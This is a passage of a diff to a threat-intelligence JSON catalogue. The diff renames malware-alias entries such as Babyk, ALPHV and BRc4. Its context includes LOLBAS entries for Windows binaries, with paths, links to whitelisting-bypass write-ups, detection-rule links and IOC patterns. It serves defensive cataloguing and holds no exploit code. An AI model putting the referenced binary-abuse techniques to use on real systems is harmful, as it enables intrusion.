[https://twitter.com/moriarty_meng/status/977848311603380224](https://twitter.com/moriarty_meng/status/977848311603380224)\n\n**Detection:**\n* Sigma: [proc_creation_win_rundll32_susp_activity.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml)\n* Splunk: [detect_rundll32_application_control_bypass___advpack.yml](https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml)[[Advpack.dll - LOLBAS Project](/references/837ccb3c-316d-4d96-8a33-b5df40870aba)]", @@ -621,7 +621,7 @@ } ], "uuid": "60d36859-4803-4a84-8ce6-b7aead8b0dd8", - "value": "AZZY" + "value": "AZZY - Associated Software" }, { "description": "", @@ -635,7 +635,7 @@ } ], "uuid": "87b3c2d9-49fa-4f4d-bcc0-91c610aafd3e", - "value": "EVILTOSS" + "value": "EVILTOSS - Associated Software" }, { "description": "", @@ -649,7 +649,7 @@ } ], "uuid": "aee4bdbe-dcdb-456e-b198-a9ec4dd0dea9", - "value": "NETUI" + "value": "NETUI - Associated Software" }, { "description": "", @@ -663,7 +663,7 @@ } ], "uuid": "66cd7902-e578-4054-8dc4-a5e027e914b4", - "value": "Sedreco" + "value": "Sedreco - Associated Software" }, { "description": "[ADVSTORESHELL](https://app.tidalcyber.com/software/ef7f4f5f-6f30-4059-87d1-cd8375bf1bee) is a spying backdoor that has been used by [APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5) from at least 2012 to 2016. It is generally used for long-term espionage and is deployed on targets deemed interesting after a reconnaissance phase. [[Kaspersky Sofacy](https://app.tidalcyber.com/references/46226f98-c762-48e3-9bcd-19ff14184bb5)] [[ESET Sednit Part 2](https://app.tidalcyber.com/references/aefb9eda-df5a-437f-af2a-ec1b6c04628b)]", @@ -750,7 +750,7 @@ } ], "uuid": "15123fcb-0ba8-492a-bada-552d828af096", - "value": "AgentExecutor.exe" + "value": "AgentExecutor.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Intune Management Extension included on Intune Managed Devices\n\n**Author:** Eleftherios Panos\n\n**Paths:**\n* C:\\Program Files (x86)\\Microsoft Intune Management Extension\n\n**Resources:**\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_agentexecutor.yml](https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor.yml)\n* Sigma: [proc_creation_win_lolbin_agentexecutor_susp_usage.yml](https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor_susp_usage.yml)[[AgentExecutor.exe - LOLBAS Project](/references/633d7f25-df9d-4619-9aa9-92d1d9d225d7)]", @@ -851,7 +851,7 @@ } ], "uuid": "4c66b92a-bfac-4f12-a319-3a16b59f9408", - "value": "Anchor_DNS" + "value": "Anchor_DNS - Associated Software" }, { "description": "[Anchor](https://app.tidalcyber.com/software/9521c535-1043-4b82-ba5d-e5eaeca500ee) is one of a family of backdoor malware that has been used in conjunction with [TrickBot](https://app.tidalcyber.com/software/c2bd4213-fc7b-474f-b5a0-28145b07c51d) on selected high profile targets since at least 2018.[[Cyberreason Anchor December 2019](https://app.tidalcyber.com/references/a8dc5598-9963-4a1d-a473-bee8d2c72c57)][[Medium Anchor DNS July 2020](https://app.tidalcyber.com/references/de246d53-385f-44be-bf0f-25a76442b835)]", @@ -979,7 +979,7 @@ } ], "uuid": "705af422-c1e8-48e4-97e1-8693ac97e3da", - "value": "AppInstaller.exe" + "value": "AppInstaller.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Tool used for installation of AppX/MSIX applications on Windows 10\n\n**Author:** Wade Hickey\n\n**Paths:**\n* C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\\AppInstaller.exe\n\n**Resources:**\n* [https://twitter.com/notwhickey/status/1333900137232523264](https://twitter.com/notwhickey/status/1333900137232523264)\n\n**Detection:**\n* Sigma: [dns_query_win_lolbin_appinstaller.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/dns_query/dns_query_win_lolbin_appinstaller.yml)[[AppInstaller.exe - LOLBAS Project](/references/9a777e7c-e76c-465c-8b45-67503e715f7e)]", @@ -1082,7 +1082,7 @@ } ], "uuid": "b2e6135b-4a85-48a4-b654-8348a9e6a9b7", - "value": "Appvlp.exe" + "value": "Appvlp.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Application Virtualization Utility Included with Microsoft Office 2016\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Program Files\\Microsoft Office\\root\\client\\appvlp.exe\n* C:\\Program Files (x86)\\Microsoft Office\\root\\client\\appvlp.exe\n\n**Resources:**\n* [https://github.com/MoooKitty/Code-Execution](https://github.com/MoooKitty/Code-Execution)\n* [https://twitter.com/moo_hax/status/892388990686347264](https://twitter.com/moo_hax/status/892388990686347264)\n* [https://enigma0x3.net/2018/06/11/the-tale-of-settingcontent-ms-files/](https://enigma0x3.net/2018/06/11/the-tale-of-settingcontent-ms-files/)\n* [https://securityboulevard.com/2018/07/attackers-test-new-document-attack-vector-that-slips-past-office-defenses/](https://securityboulevard.com/2018/07/attackers-test-new-document-attack-vector-that-slips-past-office-defenses/)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_appvlp.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_appvlp.yml)[[Appvlp.exe - LOLBAS Project](/references/b0afe3e8-9f1d-4295-8811-8dfbe993c337)]", @@ -1147,7 +1147,7 @@ } ], "uuid": "993a4563-9d3f-41b3-b677-430dbaf9bf30", - "value": "arp.exe" + "value": "arp.exe - Associated Software" }, { "description": "[Arp](https://app.tidalcyber.com/software/45b51950-6190-4572-b1a2-7c69d865251e) displays and modifies information about a system's Address Resolution Protocol (ARP) cache. [[TechNet Arp](https://app.tidalcyber.com/references/7714222e-8046-4884-b460-493d9ef46305)]", @@ -1213,7 +1213,7 @@ } ], "uuid": "dd35fa20-68de-455d-8994-914b23cf51a6", - "value": "Aspnet_Compiler.exe" + "value": "Aspnet_Compiler.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** ASP.NET Compilation Tool\n\n**Author:** Jimmy (@bohops)\n\n**Paths:**\n* c:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_compiler.exe\n* c:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\aspnet_compiler.exe\n\n**Resources:**\n* [https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/](https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/)\n* [https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8](https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8)\n\n**Detection:**\n* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)\n* Sigma: [proc_creation_win_lolbin_aspnet_compiler.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_aspnet_compiler.yml)[[Aspnet_Compiler.exe - LOLBAS Project](/references/15864c56-115e-4163-b816-03bdb9bfd5c5)]", @@ -1253,7 +1253,7 @@ } ], "uuid": "70694414-648a-487b-8eaf-beb2cc5ea348", - "value": "ASPXTool" + "value": "ASPXTool - Associated Software" }, { "description": "[ASPXSpy](https://app.tidalcyber.com/software/a0cce010-9158-45e5-978a-f002e5c31a03) is a Web shell. It has been modified by [Threat Group-3390](https://app.tidalcyber.com/groups/79be2f31-5626-425e-844c-fd9c99e38fe5) actors to create the ASPXTool version. [[Dell TG-3390](https://app.tidalcyber.com/references/dfd2d832-a6c5-40e7-a554-5a92f05bebae)]", @@ -1311,7 +1311,7 @@ } ], "uuid": "02f01a87-3a6f-4344-9241-653118990361", - "value": "Guildma" + "value": "Guildma - Associated Software" }, { "description": "[Astaroth](https://app.tidalcyber.com/software/ea719a35-cbe9-4503-873d-164f68ab4544) is a Trojan and information stealer known to affect companies in Europe, Brazil, and throughout Latin America. It has been known publicly since at least late 2017. [[Cybereason Astaroth Feb 2019](https://app.tidalcyber.com/references/eb4dc1f8-c6e7-4d6c-9258-b03a0ae64d2e)][[Cofense Astaroth Sept 2018](https://app.tidalcyber.com/references/d316c581-646d-48e7-956e-34e2f957c67d)][[Securelist Brazilian Banking Malware July 2020](https://app.tidalcyber.com/references/ccc34875-93f3-40ed-a9ee-f31b86708507)]", @@ -1386,7 +1386,7 @@ } ], "uuid": "96ce505e-9144-473a-b197-0846ae712de8", - "value": "at.exe" + "value": "at.exe - Associated Software" }, { "description": "[at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860) is used to schedule tasks on a system to run at a specified date or time.[[TechNet At](https://app.tidalcyber.com/references/31b40c09-d68f-4889-b585-c077bd9cef28)][[Linux at](https://app.tidalcyber.com/references/3e3a84bc-ab6d-460d-8abc-cafae6eaaedd)]", @@ -1446,7 +1446,7 @@ } ], "uuid": "15e08d84-1977-4cc5-a73a-bd1cadff4bf0", - "value": "Atbroker.exe" + "value": "Atbroker.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Helper binary for Assistive Technology (AT)\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\Atbroker.exe\n* C:\\Windows\\SysWOW64\\Atbroker.exe\n\n**Resources:**\n* [http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/](http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_susp_atbroker.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_susp_atbroker.yml)\n* Sigma: [registry_event_susp_atbroker_change.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml)\n* IOC: Changes to HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Configuration\n* IOC: Changes to HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs\n* IOC: Unknown AT starting C:\\Windows\\System32\\ATBroker.exe /start malware[[Atbroker.exe - LOLBAS Project](/references/b0c21b56-6591-49c3-8e67-328ddb7b436d)]", @@ -1561,7 +1561,7 @@ } ], "uuid": "cf4b3cc1-c60a-43ac-8599-fce5dbade473", - "value": "Roptimizer" + "value": "Roptimizer - Associated Software" }, { "description": "[AuditCred](https://app.tidalcyber.com/software/d0c25f14-5eb3-40c1-a890-2ab1349dff53) is a malicious DLL that has been used by [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) during their 2018 attacks.[[TrendMicro Lazarus Nov 2018](https://app.tidalcyber.com/references/4c697316-c13a-4243-be18-c0e059e4168c)]", @@ -1773,7 +1773,7 @@ } ], "uuid": "b9d20905-d9b0-41e8-8012-52cab3e626f1", - "value": "Babyk" + "value": "Babyk - Associated Software" }, { "description": "[[Sogeti CERT ESEC Babuk March 2021](https://app.tidalcyber.com/references/e85e3bd9-6ddc-4d0f-a16c-b525a75baa7e)][[McAfee Babuk February 2021](https://app.tidalcyber.com/references/bb23ca19-78bb-4406-90a4-bf82bd467e04)]", @@ -1787,7 +1787,7 @@ } ], "uuid": "30583664-1270-4dab-bff3-83f394740ca8", - "value": "Vasa Locker" + "value": "Vasa Locker - Associated Software" }, { "description": "[Babuk](https://app.tidalcyber.com/software/0dc07eb9-66df-4116-b1bc-7020ca6395a1) is a Ransomware-as-a-service (RaaS) malware that has been used since at least 2021. The operators of [Babuk](https://app.tidalcyber.com/software/0dc07eb9-66df-4116-b1bc-7020ca6395a1) employ a \"Big Game Hunting\" approach to targeting major enterprises and operate a leak site to post stolen data as part of their extortion scheme.[[Sogeti CERT ESEC Babuk March 2021](https://app.tidalcyber.com/references/e85e3bd9-6ddc-4d0f-a16c-b525a75baa7e)][[McAfee Babuk February 2021](https://app.tidalcyber.com/references/bb23ca19-78bb-4406-90a4-bf82bd467e04)][[CyberScoop Babuk February 2021](https://app.tidalcyber.com/references/0a0aeacd-0976-4c84-b40d-5704afca9f0e)]", @@ -1898,7 +1898,7 @@ } ], "uuid": "044ca42d-c9cf-4f75-b119-1df3c80a3afd", - "value": "Havex" + "value": "Havex - Associated Software" }, { "description": "[Backdoor.Oldrea](https://app.tidalcyber.com/software/f7cc5974-767c-4cb4-acc7-36295a386ce5) is a modular backdoor that used by [Dragonfly](https://app.tidalcyber.com/groups/472080b0-e3d4-4546-9272-c4359fe856e1) against energy companies since at least 2013. [Backdoor.Oldrea](https://app.tidalcyber.com/software/f7cc5974-767c-4cb4-acc7-36295a386ce5) was distributed via supply chain compromise, and included specialized modules to enumerate and map ICS-specific systems, processes, and protocols.[[Symantec Dragonfly](https://app.tidalcyber.com/references/9514c5cd-2ed6-4dbf-aa9e-1c425e969226)][[Gigamon Berserk Bear October 2021](https://app.tidalcyber.com/references/06b6cbe3-8e35-4594-b36f-76b503c11520)][[Symantec Dragonfly Sept 2017](https://app.tidalcyber.com/references/11bbeafc-ed5d-4d2b-9795-a0a9544fb64e)]", @@ -1941,7 +1941,7 @@ } ], "uuid": "4f538bd5-3e2a-44f7-b58e-97219284df55", - "value": "Lecna" + "value": "Lecna - Associated Software" }, { "description": "[BACKSPACE](https://app.tidalcyber.com/software/d0daaa00-68e1-4568-bb08-3f28bcd82c63) is a backdoor used by [APT30](https://app.tidalcyber.com/groups/be45ff95-6c74-4000-bc39-63044673d82f) that dates back to at least 2005. [[FireEye APT30](https://app.tidalcyber.com/references/c48d2084-61cf-4e86-8072-01e5d2de8416)]", @@ -2143,7 +2143,7 @@ } ], "uuid": "1679c995-7141-40ac-a327-b5afc8f275c8", - "value": "Win32/Diskcoder.D" + "value": "Win32/Diskcoder.D - Associated Software" }, { "description": "[Bad Rabbit](https://app.tidalcyber.com/software/a1d86d8f-fa48-43aa-9833-7355750e455c) is a self-propagating ransomware that affected the Ukrainian transportation sector in 2017. [Bad Rabbit](https://app.tidalcyber.com/software/a1d86d8f-fa48-43aa-9833-7355750e455c) has also targeted organizations and consumers in Russia. [[Secure List Bad Rabbit](https://app.tidalcyber.com/references/f4cec03a-ea94-4874-9bea-16189e967ff9)][[ESET Bad Rabbit](https://app.tidalcyber.com/references/a9664f01-78f0-4461-a757-12f54ec99a56)][[Dragos IT ICS Ransomware](https://app.tidalcyber.com/references/60187301-8d70-4023-8e6d-59cbb1468f0d)] ", @@ -2219,7 +2219,7 @@ } ], "uuid": "0bcd5b61-4408-4a35-9b8f-310cd23a4ca2", - "value": "Trojan Manuscript" + "value": "Trojan Manuscript - Associated Software" }, { "description": "[Bankshot](https://app.tidalcyber.com/software/24b8471d-698f-48cc-b47a-8fbbaf28b293) is a remote access tool (RAT) that was first reported by the Department of Homeland Security in December of 2017. In 2018, [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) used the [Bankshot](https://app.tidalcyber.com/software/24b8471d-698f-48cc-b47a-8fbbaf28b293) implant in attacks against the Turkish financial sector. [[McAfee Bankshot](https://app.tidalcyber.com/references/c748dc6c-8c19-4a5c-840f-3d47955a6c78)]", @@ -2267,7 +2267,7 @@ } ], "uuid": "fe0ff225-66b8-4629-86e3-9b4ce9bf6eb8", - "value": "Bash.exe" + "value": "Bash.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** File used by Windows subsystem for Linux\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\bash.exe\n* C:\\Windows\\SysWOW64\\bash.exe\n\n**Resources:**\n* [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)\n\n**Detection:**\n* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)\n* Sigma: [proc_creation_win_lolbin_bash.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_bash.yml)\n* IOC: Child process from bash.exe[[Bash.exe - LOLBAS Project](/references/7d3efbc7-6abf-4f3f-aec8-686100bb90ad)]", @@ -2339,7 +2339,7 @@ } ], "uuid": "480398ef-e3b0-4434-b409-bc6bae0a56ea", - "value": "Team9" + "value": "Team9 - Associated Software" }, { "description": "[[FireEye KEGTAP SINGLEMALT October 2020](https://app.tidalcyber.com/references/59162ffd-cb95-4757-bb1e-0c2a4ad5c083)][[CrowdStrike Wizard Spider October 2020](https://app.tidalcyber.com/references/5c8d67ea-63bc-4765-b6f6-49fa5210abe6)]", @@ -2353,7 +2353,7 @@ } ], "uuid": "7de93c0d-efb9-481c-b1dc-ea5d786c47f9", - "value": "KEGTAP" + "value": "KEGTAP - Associated Software" }, { "description": "[Bazar](https://app.tidalcyber.com/software/b35d9817-6ead-4dbd-a2fa-4b8e217f8eac) is a downloader and backdoor that has been used since at least April 2020, with infections primarily against professional services, healthcare, manufacturing, IT, logistics and travel companies across the US and Europe. [Bazar](https://app.tidalcyber.com/software/b35d9817-6ead-4dbd-a2fa-4b8e217f8eac) reportedly has ties to [TrickBot](https://app.tidalcyber.com/software/c2bd4213-fc7b-474f-b5a0-28145b07c51d) campaigns and can be used to deploy additional malware, including ransomware, and to steal sensitive data.[[Cybereason Bazar July 2020](https://app.tidalcyber.com/references/8819875a-5139-4dae-94c8-e7cc9f847580)]", @@ -2487,7 +2487,7 @@ } ], "uuid": "0a62aa36-aeba-4d97-bddb-d24cdb7d6093", - "value": "Bginfo.exe" + "value": "Bginfo.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Background Information Utility included with SysInternals Suite\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* No fixed path\n\n**Resources:**\n* [https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/](https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_bginfo.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_bginfo.yml)\n* Elastic: [defense_evasion_unusual_process_network_connection.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml)\n* Elastic: [defense_evasion_network_connection_from_windows_binary.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml)\n* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)[[Bginfo.exe - LOLBAS Project](/references/ca1eaac2-7449-4a76-bec2-9dc5971fd808)]", @@ -2607,7 +2607,7 @@ } ], "uuid": "cf8ab2a9-cef3-450b-ba43-5611d3202347", - "value": "FriedEx" + "value": "FriedEx - Associated Software" }, { "description": "[[Crowdstrike Indrik November 2018](https://app.tidalcyber.com/references/0f85f611-90db-43ba-8b71-5d0d4ec8cdd5)]", @@ -2621,7 +2621,7 @@ } ], "uuid": "3591563f-70f1-4bbc-aef8-7aa686e0fd48", - "value": "wp_encrypt" + "value": "wp_encrypt - Associated Software" }, { "description": "[BitPaymer](https://app.tidalcyber.com/software/e7dec940-8701-4c06-9865-5b11c61c046d) is a ransomware variant first observed in August 2017 targeting hospitals in the U.K. [BitPaymer](https://app.tidalcyber.com/software/e7dec940-8701-4c06-9865-5b11c61c046d) uses a unique encryption key, ransom note, and contact information for each operation. [BitPaymer](https://app.tidalcyber.com/software/e7dec940-8701-4c06-9865-5b11c61c046d) has several indicators suggesting overlap with the [Dridex](https://app.tidalcyber.com/software/e3cd4405-b698-41d9-88e4-fff29e7a19e2) malware and is often delivered via [Dridex](https://app.tidalcyber.com/software/e3cd4405-b698-41d9-88e4-fff29e7a19e2).[[Crowdstrike Indrik November 2018](https://app.tidalcyber.com/references/0f85f611-90db-43ba-8b71-5d0d4ec8cdd5)]", @@ -2674,7 +2674,7 @@ } ], "uuid": "0f4e83eb-bc61-485f-8e30-f28a051996fa", - "value": "Bitsadmin.exe" + "value": "Bitsadmin.exe - Associated Software" }, { "description": "[BITSAdmin](https://app.tidalcyber.com/software/52a20d3d-1edd-4f17-87f0-b77c67d260b4) is a command line tool used to create and manage [BITS Jobs](https://app.tidalcyber.com/technique/6b278e5d-7383-42a4-9425-2da79bbe43e0). [[Microsoft BITSAdmin](https://app.tidalcyber.com/references/5b8c2a8c-f01e-491a-aaf9-504ee7a1caed)]", @@ -2773,7 +2773,7 @@ } ], "uuid": "e7af71b4-73c3-405a-9521-d239aa60eb20", - "value": "ALPHV" + "value": "ALPHV - Associated Software" }, { "description": "[[ACSC BlackCat Apr 2022](https://app.tidalcyber.com/references/3b85eaeb-6bf5-529b-80a4-439ceb6c5d6d)]", @@ -2787,7 +2787,7 @@ } ], "uuid": "1db491da-16a4-4a9c-9b7c-c7e46f1a1dd0", - "value": "Noberus" + "value": "Noberus - Associated Software" }, { "description": "[BlackCat](https://app.tidalcyber.com/software/691369e5-ef74-5ff9-bc20-34efeb4b6c5b) is ransomware written in Rust that has been offered via the Ransomware-as-a-Service (RaaS) model. First observed November 2021, [BlackCat](https://app.tidalcyber.com/software/691369e5-ef74-5ff9-bc20-34efeb4b6c5b) has been used to target multiple sectors and organizations in various countries and regions in Africa, the Americas, Asia, Australia, and Europe.[[Microsoft BlackCat Jun 2022](https://app.tidalcyber.com/references/55be1ca7-fdb7-5d76-a9c8-5f44a0d00b0e)][[Sophos BlackCat Jul 2022](https://app.tidalcyber.com/references/481a0106-d5b6-532c-8f5b-6c0c477185f4)][[ACSC BlackCat Apr 2022](https://app.tidalcyber.com/references/3b85eaeb-6bf5-529b-80a4-439ceb6c5d6d)]", @@ -2882,7 +2882,7 @@ } ], "uuid": "2efd4571-2913-4ea3-95f8-b2e1aef4f953", - "value": "Black Energy" + "value": "Black Energy - Associated Software" }, { "description": "[BlackEnergy](https://app.tidalcyber.com/software/908216c7-3ad4-4e0c-9dd3-a7ed5d1c695f) is a malware toolkit that has been used by both criminal and APT actors. It dates back to at least 2007 and was originally designed to create botnets for use in conducting Distributed Denial of Service (DDoS) attacks, but its use has evolved to support various plug-ins. It is well known for being used during the confrontation between Georgia and Russia in 2008, as well as in targeting Ukrainian institutions. Variants include BlackEnergy 2 and BlackEnergy 3. [[F-Secure BlackEnergy 2014](https://app.tidalcyber.com/references/5f228fb5-d959-4c4a-bb8c-f9dc01d5af07)]", @@ -3267,7 +3267,7 @@ } ], "uuid": "afc6d47c-4375-47c6-bc69-ae0faf2df0bd", - "value": "BRc4" + "value": "BRc4 - Associated Software" }, { "description": "[Brute Ratel C4](https://app.tidalcyber.com/software/23043b44-69a6-5cdf-8f60-5a68068680c7) is a commercial red-teaming and adversarial attack simulation tool that first appeared in December 2020. [Brute Ratel C4](https://app.tidalcyber.com/software/23043b44-69a6-5cdf-8f60-5a68068680c7) was specifically designed to avoid detection by endpoint detection and response (EDR) and antivirus (AV) capabilities, and deploys agents called badgers to enable arbitrary command execution for lateral movement, privilege escalation, and persistence. In September 2022, a cracked version of [Brute Ratel C4](https://app.tidalcyber.com/software/23043b44-69a6-5cdf-8f60-5a68068680c7) was leaked in the cybercriminal underground, leading to its use by threat actors.[[Dark Vortex Brute Ratel C4](https://app.tidalcyber.com/references/47992cb5-df11-56c2-b266-6f58d75f8315)][[Palo Alto Brute Ratel July 2022](https://app.tidalcyber.com/references/a9ab0444-386b-5baf-84e1-0e6df4a21296)][[MDSec Brute Ratel August 2022](https://app.tidalcyber.com/references/dfd12595-0056-5b4a-b753-624fac1bb3a6)][[SANS Brute Ratel October 2022](https://app.tidalcyber.com/references/9544e762-6f72-59e7-8384-5bbef13bfe96)][[Trend Micro Black Basta October 2022](https://app.tidalcyber.com/references/6e4a1565-4a30-5a6b-961c-226a6f1967ae)]", @@ -3331,7 +3331,7 @@ } ], "uuid": "ad8fc8bb-3562-4a56-b132-be625b1dc208", - "value": "Backdoor.APT.FakeWinHTTPHelper" + "value": "Backdoor.APT.FakeWinHTTPHelper - Associated Software" }, { "description": "[BUBBLEWRAP](https://app.tidalcyber.com/software/2be4e3d2-e8c5-4406-8041-2c17bdb3a547) is a full-featured, second-stage backdoor used by the [admin@338](https://app.tidalcyber.com/groups/8567136b-f84a-45ed-8cce-46324c7da60e) group. It is set to run when the system boots and includes functionality to check, upload, and register plug-ins that can further enhance its capabilities. [[FireEye admin@338](https://app.tidalcyber.com/references/f3470275-9652-440e-914d-ad4fc5165413)]", @@ -3435,7 +3435,7 @@ } ], "uuid": "2fc667d6-96ca-4414-95d7-3ce49383508a", - "value": "OSX.Bundlore" + "value": "OSX.Bundlore - Associated Software" }, { "description": "[Bundlore](https://app.tidalcyber.com/software/e9873bf1-9619-4c62-b4cf-1009e83de186) is adware written for macOS that has been in use since at least 2015. Though categorized as adware, [Bundlore](https://app.tidalcyber.com/software/e9873bf1-9619-4c62-b4cf-1009e83de186) has many features associated with more traditional backdoors.[[MacKeeper Bundlore Apr 2019](https://app.tidalcyber.com/references/4d631c9a-4fd5-43a4-8b78-4219bd371e87)]", @@ -3647,7 +3647,7 @@ } ], "uuid": "b0ac8d42-1536-4b96-b0d5-8052308d2177", - "value": "Anunak" + "value": "Anunak - Associated Software" }, { "description": "[Carbanak](https://app.tidalcyber.com/software/4cb9294b-9e4c-41b9-b640-46213a01952d) is a full-featured, remote backdoor used by a group of the same name ([Carbanak](https://app.tidalcyber.com/groups/72d9bea7-9ca1-43e6-8702-2fb7fb1355de)). It is intended for espionage, data exfiltration, and providing remote access to infected machines. [[Kaspersky Carbanak](https://app.tidalcyber.com/references/2f7e77db-fe39-4004-9945-3c8943708494)] [[FireEye CARBANAK June 2017](https://app.tidalcyber.com/references/39105492-6044-460c-9dc9-3d4473ee862e)]", @@ -3935,7 +3935,7 @@ } ], "uuid": "4e9c6329-2df3-4815-bf21-8f18de3046b0", - "value": "Cdb.exe" + "value": "Cdb.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Debugging tool included with Windows Debugging Tools.\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\cdb.exe\n* C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\cdb.exe\n\n**Resources:**\n* [http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html](http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html)\n* [https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options](https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options)\n* 